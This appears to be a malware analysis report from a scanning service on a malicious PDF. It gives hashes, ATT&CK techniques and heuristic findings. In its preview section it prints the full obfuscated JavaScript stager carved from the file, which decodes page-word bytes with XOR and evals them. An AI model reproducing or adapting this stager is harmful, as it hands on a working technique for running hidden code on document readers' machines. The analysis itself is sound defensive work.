Malicious PDF — malware analysis report

Static analysis result for SHA-256 807b5c9d169bf21a…

MALICIOUS

PDF

5.6 KB Authoring application: Jidagelageno (via 767e7Ylojoppekaxopqi) First seen: 2026-05-08
MD5: 560fb2c6ab203894d7c5a6e4ecfae42b SHA-1: 3c37ee1256d27c7cf5556a745be44655744f815c SHA-256: 807b5c9d169bf21a31883e8c953532a9ac8ec6d836f2668f42bc93c1a5ebb880
86 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1566.001 Spearphishing Attachment

The PDF file contains obfuscated JavaScript, identified by multiple heuristics as a stager. The script attempts to deobfuscate and execute code, likely to download and run a second-stage payload. The presence of JavaScript actions and embedded JS streams strongly indicates malicious intent, consistent with a spearphishing attachment.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 3

  • Page-word XOR JavaScript eval stager high PDF_PAGE_WORD_XOR_EVAL_STAGER
    PDF JavaScript enumerates rendered page words with getPageNthWord/getPageNumWords, extracts encoded byte fragments, XOR-decodes the stage with char-code helpers, and evals the result. This is an old exploit-kit staging pattern and is not normal document JavaScript.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0008_000.js pdf-javascript-stream PDF /JS object 8 at offset 0xF52 1346 bytes
SHA-256: c510f8c6a5031d17c6606a6a4e88ede1c3452bf51c2d06efb7ba03d3692fec56
Preview script
First 1,000 lines of the extracted script
var rM='';
var n=String("leng"+"th");
function fCP(xQ,kDU){jQ=["vE","qDG","cT"];this.lG=32766;this.lG++; return xQ+kDU};
var yL=/[q4\$9LR]/g;
var lS="pro"+"tot"+"ype";
var yR=new String("eva"+"l");
var cZ="rep"+"lac"+"e";
var xQN="varq yN=tRhis.jq;tr$y {fOq={yNO:\'eval\',sX:\'getPageN9thWord\',lW:\'s$uLbstr\',uVQR:\'pag4eNum\',eH:\'length\',xO:\'getPa9geNum4Words\',mD:\'join\'};rSB=16;jW = 83 ;kN=q0;uN=[];nCF=332;eN=L\'toStriRng\';cB=2;rM=\'\';tS9=\'\\\\x\';nC=String;fE=\'\';eD=\'\';iZC=1;;u4VY=yN[fO.xO](yN[fO.uVQ]);for(oTR=4kqN$;oT<u9VY;oT++){var mT=yN[fO.sX](yN[fO.uVQ],oT,iZC);eD=[eD,mT][fO.mD](9rM);;}for4(oT=k$Nq;oT<eD[fOq.eH];oT+=qcB){t=eD[$fO.lW$](oT,cB);rC=parseInLt(t,rSB);aH=r4C^jW;lC=aH[LeN](rSB);lC=(lCR[fO.e9H]==iZC)?R\'0\'R+lC9:lC;app[fRO.yNOq](\'yP=(\"\'+tS+lCL+\'\");\');uqN9.push(yP);}fER=$uN[fO.mD](rM);rLEH=fE[fO.eH]-nCF;yN.cZM=(fE[fO.lW](rEH));RyN.rY=(fE[fO.lW](kN,rqEH));app[fOq.yNO](yN.rY);} catch(fE){}";

;


xQN=xQN[cZ](yL, rM);

var rG=this;
cH=5603;cH++;
function hE(kF,rY){lWX={fK:false}; var xY=this; var pE={iL:24712}; xY.uL=kF; var rQ=new String();var uLWX=["tW"]; xY.j=kF;  var bA=false;rAZ=["vSN"];oTI=["oZ"]; xY.j[yR](rY)};
this.kB='';
this.eL=32343;this.eL++;
var tE=["sV","pM","uF"];this.mTW=2004;this.mTW-=75;
var kN=0;
;


var bCD=new hE(rG,xQN);
gP=4385;gP--;aT=22733;aT--;
var dC=false;hKV={};

;

Open this report in the interactive analyzer, or submit your own file for analysis.